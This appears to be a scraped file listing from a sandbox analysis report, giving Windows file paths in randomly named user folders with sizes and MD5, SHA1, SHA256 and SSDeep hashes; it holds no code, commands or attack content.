C:\ProgramData\Microsoft Help\MS.POWERPNT.DEV.14.1033.hxn	0.36 KB	MD5: 3e8e251a76f604d18454de05d436de11 SHA1: 8efbf0b90d15192ba7299e07a04d6f8f99b30364 SHA256: 21e0094523482ba5701f6ca4177c267c935505e945ccf87b4c8c09e4af688106 SSDeep: 6:gnpdHCGmROG4AuReiwuBgeAU3DyY2a4ZRAuyR/CQPz7SzPuu9DzFfLCr:KpdHCjYG4IMBT72awRLsZKPuiz5c	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Gallery.url	0.13 KB	MD5: 19e0777d0d1cc57863e57a9a9ea704d8 SHA1: cc87b36707b5736a9e49cbc52c6c36b805683adf SHA256: 9fef96aba45269a95fc803bd2539960ebb0a798d1af016d3576564ccd7620103 SSDeep: 3:afwSkqOCAPkOfaO7dvjYPDz58Q0xz6vtkdzN9exub0cSWszr7s:afwSkeMRRkPDz58dz6vtkhsclSM	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\skaVx\4xdI4OMOFBx3cqRfxwA0.xlsx	43.21 KB	MD5: 93c8c11216be79b0db9015d1df7b534d SHA1: f4b358aad1855d1545b8b4f0b3e555fccd7dd463 SHA256: ed17bfb7180e3b03b9ef95a65e23d328d5a23d4bd794dbe3d25b1faae173e799 SSDeep: 768:6LO50uCUBQcE7i36+l+FW/tbITwjU4XgG7e9v35Q03bzU76P6sp8bKdOmP/+gplA:6LO50PUB67iJ+08wze3Hcxsp8bIX5lA	... File Actions Show Properties Download
C:\ProgramData\Microsoft Help\MS.WINWORD.14.1033.hxn	0.33 KB	MD5: cf49eea4ad5e38250e45a3c772051bda SHA1: 152bbe66e5974b625c76434ca62a42bbdf08b091 SHA256: ecf86183341598c6216050d88d1e5e0f3dd112cf6f4a9e9cd2e2724a7379d1f3 SSDeep: 6:gnl5BV58u8HZthnFmxKpbZq6SmGj7fdiGIdzjAz9Fz9zPk2n+8vNpSKbkm:Kf5Snp5Gj71iGI50xJ9zc2nzvNpJB	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\desktop.ini	0.49 KB	MD5: cd9b253f57aec6718a63f6cb1cccf4ad SHA1: 7735b4c1c3bd3cc059d1ca8f144c0f21de6a3e0a SHA256: 2a255b315f7980bd5191f91e7d9505e2cf3ab241184f6899dfd99439f5029711 SSDeep: 12:ilZ9RF+tHms0asKmkNKZK0Le+qYGRO6Pc1q3NEWSw:il32hsVU0iHcs3WWz	... File Actions Show Properties Download
C:\Users\All Users\Microsoft\Assistance\Client\1.0\en-US\Help_MValidator.Lck.INFOWAIT	0.00 KB	MD5: 62844323a4b7d96693287ba03fc234c6 SHA1: 3f511685ef8fb140118aa10c1c43e026a2262443 SHA256: c4fb81f5bf1132f2df6094aa4094ecf05b750c041086477aa839738c73449fb7 SSDeep: 3:5n:5	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\BflhCY_h.mp4	24.26 KB	MD5: 8225e00e8e78c5c04819343bdd20ded1 SHA1: 01deaaa100a6a3bbdb56d17470129b509d0f530d SHA256: d35a7b46521b71257fc32490ddf2516f35f9c87c6dd518955b2cd28416337332 SSDeep: 768:RtQ/D8aW/7ebNqCjx7Pk+llTqRsD+wdj48ADRAZ:RtQ/D8anqCj5c+7qWRp48AyZ	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft Store.url	0.13 KB	MD5: 7e4be9e940bb241fbf0e950fde52eac7 SHA1: 8d6e61ae3717b0d6e0a94351d3e9806ce2f77fed SHA256: 82bb6e6b8d597dabd23028c6c8f0c85b8c2d87a147171734e613d202a3c6bcad SSDeep: 3:afwSkqOCAPkOfaO7dvjYPDz58Q0xz6vtkdzN9exOZrWbV:afwSkeMRRkPDz58dz6vtkhlra	... File Actions Show Properties Download
C:\ProgramData\Microsoft Help\MS.OUTLOOK.14.1033.hxn	0.33 KB	MD5: 8a1f7b069d3715df19de5b70757acce3 SHA1: 853b41df1029a0e852d58353ae6601a42e391af8 SHA256: c65bb0ae210df9f0b2674d4a873d7e6b4e2027b906d01fcd2588754d7b83332d SSDeep: 6:gnl9sTD/LDFtuJIxKpbZq6SmGj7fdiGIdzjAz9Fz9zPk2n+8vNpSKbkm:K0TLdgJ1p5Gj71iGI50xJ9zc2nzvNpJB	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\xsTHwcnuDqWQ9Jfwv\5NOeuuWGic W5vSvZ.png	18.90 KB	MD5: e70878281a0c7eec509c4fdf958b2bbd SHA1: 7d2068e22345fce77f6b47c736daed8753cd2864 SHA256: 70e7983a81a1402255111bd49aab691ad21120106b5bb5f53160e35e4e905f3b SSDeep: 384:ZNVXyvvYe0my70yMvz31jOkRR5lx1vrnG24mF7I04uGL/E9T:VivvYnmmMvzZOkRjImdsuGL/K	... File Actions Show Properties Download
C:\Users\All Users\Microsoft\Assistance\Client\1.0\en-US\Help_MValidator.H1D.INFOWAIT	14.32 KB	MD5: de4e862f03283db89bceedf31cb9d1ba SHA1: f0d299cf47776903a06c1cd9b1b31ebc6dc0af3c SHA256: 1182b0e64da6b505ca97335bdfcc3c610bd01418d67d86373021970bd2f6d817 SSDeep: 384:pIAWVh37e0ZIMl2t7ne38gF7ysx9TGSEn61FoD19gpYXMzh0s:lWr37qMWe38wDxUwg192as	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\rsqxo_hm.pptx	23.62 KB	MD5: 635596f110d9668745eff4ee6c06154f SHA1: 5acb9ec6b405705c46b3534b1c4562781919a97c SHA256: c6abc4ee70b1fcd581981a810cd637b9dad90fc951798c3e01cac053d3ea1f7e SSDeep: 384:of3hi+NcRYJNvOOjp6Md6IrYJ6fWG3x0GhiGk8pIR/sVNACcQblwhdJifwrt6BjD:ofjNcRYJtOap6I6lYOG3GGsGk8pqU7yM	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\86iUKOznOtmWr4FTVK.xlsx	83.35 KB	MD5: f6e2035013a6b9ece80c91c81efaf98f SHA1: e679ecfff167d0fa0c89c8dee2b4f3274f50bfd0 SHA256: b73a93d5fff5aaa9475aab9986ffd501e345b5df3ba96803c9b0f985788185d7 SSDeep: 1536:6wgPy4gBNC+14b/iOcZN5JRZ4WQ3a78DFTRdTcu7dWJR5Bznnk:YPy4WNC+8qOiPJRZ4WQhDXdTciWJRzI	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE site on Microsoft.com.url	0.13 KB	MD5: 2f10f67b16694d563570958de876db96 SHA1: 6810e6f8a68c6c07483513a985e2c94b5dbc166e SHA256: 7789491a2c7d614364d16615a3d7888f12a6c28efb66ea36355a73b868bd0cfc SSDeep: 3:afwSkqOCAPkOfaO7dvjYPDz58Q0xz6vtkdzN9exOBPs:afwSkeMRRkPDz58dz6vtkhu	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\xsTHwcnuDqWQ9Jfwv\RCe6gFP9n8QcDK.gif	37.10 KB	MD5: 0282303f4d4c72d2041074c471323c5e SHA1: 9adb8261fd40d33610f3e8bbe9a8dc994384e973 SHA256: e7e084352cab1e538fde425703f274327edc487aeb8a7000f568e2bc187a04c7 SSDeep: 768:CTybEFNB5ayT+xXBASkqGp3KE0tV7/6TW/AS3wdWeirY7r0:CTpHTEBa/1aVvwdhr0	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\SNwh\2L5Mp4CJ.ods	54.44 KB	MD5: 8964107e84cd6c58c0f06c47edf65a53 SHA1: b7a53ad9547272f28514f7d5836cdadf6d4423e2 SHA256: c491399f98685e43b0a09b0143fc811bfa8c1700ba91d00b6049840f7da37341 SSDeep: 1536:gBIlQE6vdGqnI+ODT9L/SG+y2YCMzGI9/GH:AIR6vd/nfg/cy2YvCS/GH	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\rXoVxt3oiS\O5g4jLerSHDy3Pf8Z8r\wlnli51d9s.mp3	51.54 KB	MD5: 32f4f75017db4e9958956982db892ba5 SHA1: 9876ad92dd7feaed95f8b67f556f65bc11670ffd SHA256: dde02e9ae4e7d3788dc8c53a1b0aef1139f1e09452368b797d93d5c251b53445 SSDeep: 768:fMdGUhBvWIzWAoTlwG/UZG2uZtvfF6bLRT7gPRQ3W7//twnrDSEWLx:fMdLGuo6G8kp96bKPB7dwn6VLx	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\rXoVxt3oiS\CZRVI9TRu5syJMCnyOV.wav	96.70 KB	MD5: f0463f1d6d848bb95bc05d80497baeaf SHA1: c0ac81fb8da8757009e4ffb5286d30a525daacac SHA256: 5619dd0fc57de3d08fbba7aae814ec31febc90c8b92a89c801de95b22f264140 SSDeep: 3072:32W73k16R3jfBmUJ0xGBhQ+ILYelVKM0voA3PmoQgIQj3:GWb06iUJ0xGBPILYcVKM6E43	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\qRUUXSSNmlOJdjR 6U.flv	22.17 KB	MD5: fb8240c0296445b21905895c2fe144ff SHA1: 41b531f2bdb1dc4165f53eeb447b8caaba2bc8bf SHA256: d2e080894adab1c1ecc9c575acc494ff7fbf7f4c9019ddeff84fefeef832c484 SSDeep: 384:g2ZGKbB2SMNiM2nUDOqH8VsGBw+rWNfIgtDWGSPm7BMQ07Zaj0KOhtp8ndXCFfJp:wKlR+p6UDnH0s4zgtEO7B4k0KO/p8nd0	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\r0_POyzPZT.pptx	77.23 KB	MD5: fb8916b65dacb440e199a1fa18629213 SHA1: 42dbe34ccfd73f67f690fd6bb37e56eb8f4caa6a SHA256: da968741cf87fac484f10a6ba2bc538c19dc46a4a6cb5020a8c968b9eee1c0b1 SSDeep: 1536:oI7ZPVxgmxAM/8DVpOx2bG6n/N0u2MnESde1fDT5RhxvjxbvxewmKXs2C:vZtxxt/YVidgFKMnncfn5Rr7FgwznC	... File Actions Show Properties Download
C:\ProgramData\Microsoft Help\MS.GROOVE.14.1033.hxn	0.32 KB	MD5: fa3affca4a7a54c9902a8b557bd6363d SHA1: 218b9b2196a5f338380442ab8844120e9bb45c00 SHA256: a64ea930cafd2114240322b1619d342783ed93af022c0183ab1af7080dbad156 SSDeep: 6:gnOfc7i7YHffBRt0t2bm3PA++eipFPMszjVftQGaWP2TU5S9l0rPpNa:KOf9grVbIN+TpFPMszJfiGJoU5M0Lva	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\4fONS\XRQKbLhwuLoes9nMF eV.m4a	80.65 KB	MD5: f41329825d86dd23949b152f9120cfe6 SHA1: cedcddd4d7940e2ae597e1b36bd33e54a283f6c9 SHA256: 181dba1a31fd1b332691de7c2a88aa399d2985e5a432300bf06984277940f2df SSDeep: 1536:f6wmFvxFaVO6yvDTp75DGdnn+sLIiK8XHtFkRGg5/a4nhj5yrb:Zmlfai7Tp75+nn+sLM6HtFw5/aM5yrb	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\unlt.docx	17.46 KB	MD5: 0ea13b9e1889ed7fd9ca14869c455665 SHA1: 2e7741cdfc2474be1c08dc0421b03381a40e42ad SHA256: 8d7f42fc81358abc70aef5c435fcd006fe97798ec4e10942c5ca6752a2db5082 SSDeep: 384:L4AAQif/LyQj6lOTTajBxYYZYgM0UperSlW0hf4cu+ttyHu4f3Au:LsVtai0w3U1cuRou	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\_ERMKi.m4a	2.62 KB	MD5: 1f8f970c2fbce0d0fd18d0dc7dd64f5b SHA1: f86f31453bddfbaeef88f456df83c08b8d8b9e90 SHA256: 33c31cc947e9b924cdbcf78fd16aafe34319d4379c418fcd0b3a3b7bf4769d7c SSDeep: 48:z13Dtp62PjE5ent0vk8h2EmNQ9cKQH7ZK3wca5f+gvS5:z1vE5XZTGd7Kwc0f+sS5	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\rXoVxt3oiS\O5g4jLerSHDy3Pf8Z8r\P-MyT-xFsgCgO.m4a	27.16 KB	MD5: cbaea3eaa65abcc118e94a81281d11dc SHA1: ca3452ad6f0c5d91a2a94e340a660f04ff74f164 SHA256: c95569ebfab63b9a9f954ab003a54fe8f8514d115869c47c216efc6db8e87062 SSDeep: 768:RY9Ft5/gRyUsU+oz37aRSB2x88gkEM8DUwpd7eSmIHq4cxK6z:u7SIsz37asAxbqvDUwpXmELcxKM	... File Actions Show Properties Download
C:\Users\All Users\Microsoft\Assistance\Client\1.0\en-US\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q.INFOWAIT	852.77 KB	MD5: 5300899e6d9a7f1ade9d4935bcd6c084 SHA1: 028559db4ae2abc85b24ad4074965cc3649df898 SHA256: 9de290428bcdf0eab7672e4c7e76647ef957fb1bfc64afa8c1e0d5e374c0ac8d SSDeep: 12288:jL36lpuntP6ZWH72qVt5XpG+qx1IiFayg90euNM1JU7pPzDj9aNEJrM:jL3NJaqVzXpG+qx10vwcJKPJKEJ	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE Add-on site.url	0.13 KB	MD5: 9a341727a24e448453308654730c46df SHA1: e7b1705ed7ea801c4f5e18f76a948596b7696870 SHA256: 73c156345fff55f945105e5f941e8f51207e2e81bdacf30f43acc2ca694b98c2 SSDeep: 3:afwSkqOCAPkOfaO7dvjYPDz58Q0xz6vtkdzN9exubiOn8us:afwSkeMRRkPDz58dz6vtkhVn8R	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\Dkb64er\Kgbiq-5bFu_gdXcNS.csv	36.04 KB	MD5: f4085234805dff5f1b1569b7c34984b3 SHA1: ee20fd4691b683e75874cf0698bb1af140f75fa9 SHA256: 582c2775b85a0aa9e3d1bd686196c99993d4da8fe8dc6d4f46e15e4207d1bb5c SSDeep: 768:e4W72LF8MaVgwJf+uttuB+fPeJ1KtcP+5DQ4Yk:e4WE8dizuSBwRI+5DQ4Yk	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yvz8Ck.xls	41.66 KB	MD5: 503a7251d6959daf79067ee4e55fec08 SHA1: a3fe43f8b8351cb3d7eda8ec2ff6b0607cbecf2d SHA256: 5a93f177afce0bd3035078d1c9cede199d6e08bf6cde663cfd3ed823fb87fa98 SSDeep: 768:/VNk1VIdbFKhbmFKxszyXNnnx/CwHH6tHSKWgOYqTwYFkwCRfHI4v0:/Q1qdbYhiS9nx7HWyuOYWzrCRPT0	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\q93T.avi	22.21 KB	MD5: 14011ffc8785fae49320350518b9d947 SHA1: 0bb432a8889ea525007210dd1b992d76ab3bf4e6 SHA256: e4d44be7ecfc7a93ea68e371befc08eff2aea1690d845debb9d27782378cef1b SSDeep: 384:75zQo14gVyoYaMxGKdNg3YtwHFnZj+nUIxhM3Qc2GIJ4rEtg7izN76LP:758oCkYaMxGKne2gg+QcXy4B	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\O89VrUgck0WGUK_Y\g1B3M3.avi	92.32 KB	MD5: fedb48a3914425825b9d1b4c20b32f75 SHA1: 029f47447f579469a2a4dcc46ea19f2ff69e3986 SHA256: 34b1219c81d2470513d279929699b53b7c9629decf9209b0a951e630b28dd960 SSDeep: 1536:ymBjOL8tRyrAGPswu2M54muunGGPacb019r5kYGAdQO9WYpl:zjO4yAGPs72M54mUce56ACO9xj	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Work.url	0.13 KB	MD5: d9dac31e811d04eb99ccf1baf197380e SHA1: 21f6e20e0e6608ab702b3f38e307fd5ac81c01f1 SHA256: 6f3ee2bfe7e8973e882bc87d1fa579f66f0030447f26f1e1e4bfa85c4b53c7a8 SSDeep: 3:afwSkqOCAPkOfaO7dvjYPDz58Q0xz6vtkdzN9exO1r8+7s:afwSkeMRRkPDz58dz6vtkhy	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\VmQaguirc.mp3	41.57 KB	MD5: 880110920437c422909509dd47cfa7d4 SHA1: a27e340cebd03fb6b1001b83b0899a706bef9158 SHA256: e524ac385003b50ebe00f13ca06a4efd705128821f1a791013532ec91b73e9b5 SSDeep: 768:f6b26s4QMuWwlV6lprbmBZyeHwOvkEzySjHT79CqXw2t8WILYlo5vubVBz6:f6b21hMmVgwZymJxjFCqA2t8WILYYCr+	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\nvyg\pkWtVne.wav	18.28 KB	MD5: 5b56e7c482c5cf791e37b69a23e65b44 SHA1: e066f6af69e674e8c37a831e6d004e4585eef19a SHA256: fd1dd07f6c30232cb63a54a99b771aa70839639d37d354a63b49f8434c546fb3 SSDeep: 384:nKGNczUEFG1dtZzplwtV1U3jFO0jSIZ+nsU6pudsVTYavoIcEHpcOFi:KGNctITpGt3U3RBjSwosZpudQQIcEH+/	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\Dkb64er\hs9eu0cg_VHy7\pplpY8py2zNIuuEmOh7.pptx	90.19 KB	MD5: 58a8b00a4b6c9ad2c79f080033995752 SHA1: 86a474f54583efcf8589382bb8ecab0c210cfcf1 SHA256: 31412f28eb5fe7a2939976f27a95d6847a77678074f6e61b5f472e3465ad5170 SSDeep: 1536:oHBa8LSYvly7PfqynN8sOzXH4/TxY/Sg6huLdjULgMLMyCv4TjeXj8XJzTI3dE+t:ezHvUfqJXYMSg6aCgMQNXj8XJzTIv4U	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\desktop.ini	0.08 KB	MD5: 427e8f6cb1f89e67f07072375ec15530 SHA1: 050f80144db2f09b8ed8bb03329af547986637af SHA256: ed5af0792e131570051f1c0515347ce841bc9f3e8204bf2887f527b62adb155c SSDeep: 3:sbgNoTKDUwCau9gy+uekfun:sEB/Cl9Fun	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\Data1.cab	10.00 MB	MD5: 24bf4c01d1734547c879cff2aca3e05b SHA1: c12ed3bf5ed57ff57d73f689dfa8231147d475a0 SHA256: 161a33a080bb9a1153ceff2810d3c1a8d5e782e4a2d37d903f351da2e464d521 SSDeep: 196608:hpWdNm7l//upum9uxpfp4uZ8q7zEqaZswqLhQTcvlj9/z2H7DLKH8:Fl//upum9QtEqaeqc3/iH3mH8	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Adobe\Acrobat\10.0\rdrmessage.zip	41.50 KB	MD5: 71c6c61642e84e5f85e10935659a3300 SHA1: 6d5d6756e006bb6e78c0edaff4ae5d7972bab29f SHA256: 2abd76b8a7064154905aee12063e9ee01f16a77d088b5a6152157a68e3841738 SSDeep: 768:V4Y7MikXkcCjUQb4qiZesKi8aHoAzehkB5bHXnss0Dj09++pf:V4YVkajUy4qhsB8aHoAzehk77ssl9++x	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\QVNDMBKO6iJXOO2h3\xjB5_nJ6.flv	19.68 KB	MD5: 41972ad9ca88ce308ae510b64c4057eb SHA1: c1610253de71ce9f3e405b0a8ff0a446870bf355 SHA256: a34ec57362165e9105ab3bd1c3bf3a2c7541a5e9140ddd254953e3050044c5e4 SSDeep: 384:gBI/U0UXBrdDjye68rPbeF6iy4IRDGNyL8HIwvJC4gvrM5bi:GkU0CdNRP4y4wqALMvJDgvQti	... File Actions Show Properties Download
C:\ProgramData\Microsoft Help\MS.INFOPATHEDITOR.14.1033.hxn	0.37 KB	MD5: 11c27f181606d672c230b6b53e6ea994 SHA1: 7b472d38b45fa2d34dd57f9133a00a1def86bb96 SHA256: b21a856445aaed1e7651fa6e82a93f7b0a3714c81e71df836a39f36daddee5da SSDeep: 6:gn9dH/0BLjFj2UAguHfniBBjHePVUbZXU5ImmfJvMSke2VwcVRTfxmzBMQ75ts0N:K9dHMBI6UiBBCPVU9k5cMSXzazxmz77l	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ztTnKYuZ\wKKlBy5ZmIsI.flv	87.11 KB	MD5: f387df9d27cc59e9dc383d18d29650ca SHA1: b9d5524b259ed293114477e24f0ca59b6905a8eb SHA256: 2ae9c73b632d132541fa32a2550e736dbb757f399277082e93bfe0cedc60f8c6 SSDeep: 1536:gXisTAO1Nt2mNBXDvyb6MQUjZWCt5sHbUr6rJFfuk8DU67Rd0hdSpff+tECW:7sTPVv9UjZWkW7rrrf2n7R8dSpffEECW	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\desktop.ini	0.49 KB	MD5: 05c0e2fd98e1c027872e8d83d19f33bf SHA1: 7ded9a4a157b7c3f7dcdd8a7196427ad564053f8 SHA256: dba439916406e7161bfb73a79357414a3b17b2663263359acc2b7d2a5b7cf755 SSDeep: 12:ilZ9RF+tHms0ascmkNc0Le+qYG8e16Pc1q3NEWS+:il32hsZ0KAcs3WWx	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\ubh3Kx_A\rtYIqoqrRvq.bmp	21.14 KB	MD5: df4a9d02a9b40f03b3f86931ce8c3b82 SHA1: 3772333df43c120af578529bb16d48b018b70c26 SHA256: ae7400599a24ebf4c9c6b1f4dfb5e879745a973f53208649e609bf8831f13d06 SSDeep: 384:nndyzdAQcgygKFIgAEmtAVGkBu16Ozp6SeanMb8iUwVceB5YqBFnI3lVzUE/V:d7bT7IYm+gkk16SUacJTBAlVzdt	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Get Windows Live.url	0.13 KB	MD5: 3f508c5552765c3342d4a749c119ac54 SHA1: 9b800fd0841412f38d4bda6a239c4fd4f547435e SHA256: 2114e05b7c43f1fab51dea98df10396a6ecc2d608f5c52813f543ecc380acf24 SSDeep: 3:afwSkqOCAPkOfaO7dvjYPDz58Q0xz6vtkdzN9exubr3Hs:afwSkeMRRkPDz58dz6vtkh4	... File Actions Show Properties Download
C:\ProgramData\Microsoft Help\MS.MSPUB.14.1033.hxn	0.32 KB	MD5: fb508ca57d92db40bfb0e287cccdf911 SHA1: e81220439898b91af720702ba713fb18d71b0ac4 SHA256: d61b8541808bd1075e3dede7f1feed23e0b19a0d17433bb0e4d8a2a9dadb3ad6 SSDeep: 6:gnGi1KUNhFSoHMvV0xzNPn2JXq3K9fNIamKpCiGSOxje0IAZLcjEWHSFmOltPR2:K8wX7MvyxzNvm6aHIamKhYje0I8cAWH9	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\n7JpqV\8ctUF06 2SC36xX7cR0\FN7 jccu.png	36.77 KB	MD5: d15e925370eba5f5d4f1573fda47c44a SHA1: edd754cd69ed0d238d98b07a420a452f8a4cb8d3 SHA256: 483583b38cd445fec89c8d60c641bc006ed1e71ae7a0269647e1e4b64c8454c3 SSDeep: 768:LVW+DNcl1j34vu8B4U1iCreAryzpFqpiEfaSmA1t4wDB78P1UUVXiw:Lot3uuY1igry7qpiymA8EOFiw	... File Actions Show Properties Download
C:\ProgramData\Microsoft Help\MS.VISIO.SHAPESHEET.14.1033.hxn	0.38 KB	MD5: 65d57120fa4eff4cdcf8411cd3386aa3 SHA1: 0a2a553ce16a6d31400feeb75acad6155125e1fd SHA256: 610aa9aea0ab25ea3bb8b40eddda84ad955e354c0ba0887eb1cde8db9b169e37 SSDeep: 12:KxdRza59ACJxB+vLqjtBomu6SqJLYE+gpCOn:Kxds0LmtBomuhqJLYEOOn	... File Actions Show Properties Download
C:\ProgramData\Microsoft Help\MS.WINPROJ.14.1033.hxn	0.33 KB	MD5: 9251c4899da1873f70b72fb967c9effb SHA1: fc39595428ad91702183bce0ed28bf702a780a74 SHA256: 80aa76e90c4e6693704da73bf7f39f26ba9d8427fdab74c6f78f93d2b7e26207 SSDeep: 6:gnl88unJJThY9+xKpbZq6SmGj7fdiGIdzjAz9Fz9zPk2n+8vNpSKbkm:Ky8eW/p5Gj71iGI50xJ9zc2nzvNpJB	... File Actions Show Properties Download
C:\ProgramData\Microsoft Help\MS.WINWORD.DEV.14.1033.hxn	0.35 KB	MD5: fa4103567a27e3f5146c15d9caea3615 SHA1: 29b234922e2f18e0b74f18d28bb7b3940d1cb401 SHA256: 82e021f60e52df8afb915c7cc68e872a95fdf850ad2ec2c5bf467a838fc6450e SSDeep: 6:gnjBVhy29UC0qEADtpJ6K7pD+ZifNHZnHjNQseFu0+VQ+DypUqwi92y1MeUqd1:KPhy0UC0qEmtpndiIFV2sezB+DJbi9VD	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\fWq7Sf.m4a	2.28 KB	MD5: 2a4a79a06cbdd90e617b7e16068eda07 SHA1: e9126b3b585d288782ad2291c5c556ef2eeb9cbf SHA256: 95b362268262563fc99575f59507b487af7a0957077b10f2fb8297e33f3bf703 SSDeep: 48:zC2+NdSA+azaTohn2IXVy3MsIL2Ni7UpkQhPIGphT/mEO9/jDtiWkr:zQNQLazl/sIS7kO9hTVO9/j51E	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Hy6vDgJFghnTAj77.xlsx	10.61 KB	MD5: 41903efd1c809883e4fbf16d56b7d0e3 SHA1: 8dbcb70740275754402f630a7862333b85a800f7 SHA256: d30fb392accea894cd0a2de376cd3d31f63383218f7c9568a1bea6c27344719d SSDeep: 192:651eKd9HTyJuu+nu8EYLxCnaBeFLITdPAs+LY6dOEl18flFzyWdwa0YCosUKFag:651eK/HWJuu+tEYLxBB80TdPAsYddv8O	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\-bVmT_XCtJmzFCE.png	47.14 KB	MD5: b383ac65b9d25af49866b1999803d00b SHA1: 7a0bf335dd60d0d21df6b0c30e471f1021ce7755 SHA256: ccbe28f6223a3fa50a5c6bb49c9a4d0da7ba27f3433e4c4ed4763ea4e67ea883 SSDeep: 768:vxvpip8WcyxL2Vnp1qT3MoVLNopAemlPqKTJBg5RNxmdfitwkf4Pq3wLQR1McgmM:681DK3lLqmemQKTnCvxmQWNPq/1McgmM	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\hT-SqtZX\obgiME5jO2.docx	50.46 KB	MD5: 297d88ff64464316701c8be5668c7095 SHA1: 2d50f6614c526aad3e584b42fb3a6c6e80bdfcee SHA256: c216b8414bf2efce6768752d1ab70fafb7e72d8aa12bf707fb8d60a61a687f1a SSDeep: 1536:LCJiK8CC1QsQJ8XrkyrmtP9ZFX7jtjD+e:9VXrkyri9DLjtL	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\QaUjhe\B-lTUwZlpVSP7x8c.gif	64.28 KB	MD5: da3aca7f020e13c27d9747245931cb86 SHA1: 05eddb51a914efd53a2e187c662dd4ad317c4a30 SHA256: 217eb986399667164f03b62cbc938b1c1aec2c5cf0dcaf709ae76f32ee7f0b77 SSDeep: 1536:6dEY2WCB2B9XD1HKSk/nD7z23vKW3MVP7PnGtaiQ:6iJmXD1mQvKW8R7PnGtaiQ	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\-3gHp4i8DBQd4Fi.pptx	85.22 KB	MD5: c2dc2367423e286dcd521610fbc982e5 SHA1: 9098d365199c21589baf32757408c1cb9916b1c4 SHA256: a22e1f81555e58dd4b608379b2f4c3b0ae9813f9c4561ac874bab95114cde97a SSDeep: 1536:oMV6RcFyDBDEvO3OzZfMIfRZKt49jXyxwFY7UZ9ZDSZ/cScT2r/CAxqJq6f+f2U:F8RmABDEvO+Z5Zf94sY7UZb+/2T2DCA7	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\n7JpqV\cc0AC KvAZVVI8uX.gif	30.29 KB	MD5: 1ebafec902eed504a7cfb6721c669056 SHA1: 8c4f273e56d19275a879a92077ba6fd2baccdd97 SHA256: a2bef4f75457eceb17de55ae950e4f61c445efbf54f4d70b8c4493ed9441da2e SSDeep: 768:5AW9DmZQSsFFFf2JkZcCUXuBARUi6NPu8BztB6l:+W8ipZc/XuBACix8BJB6l	... File Actions Show Properties Download
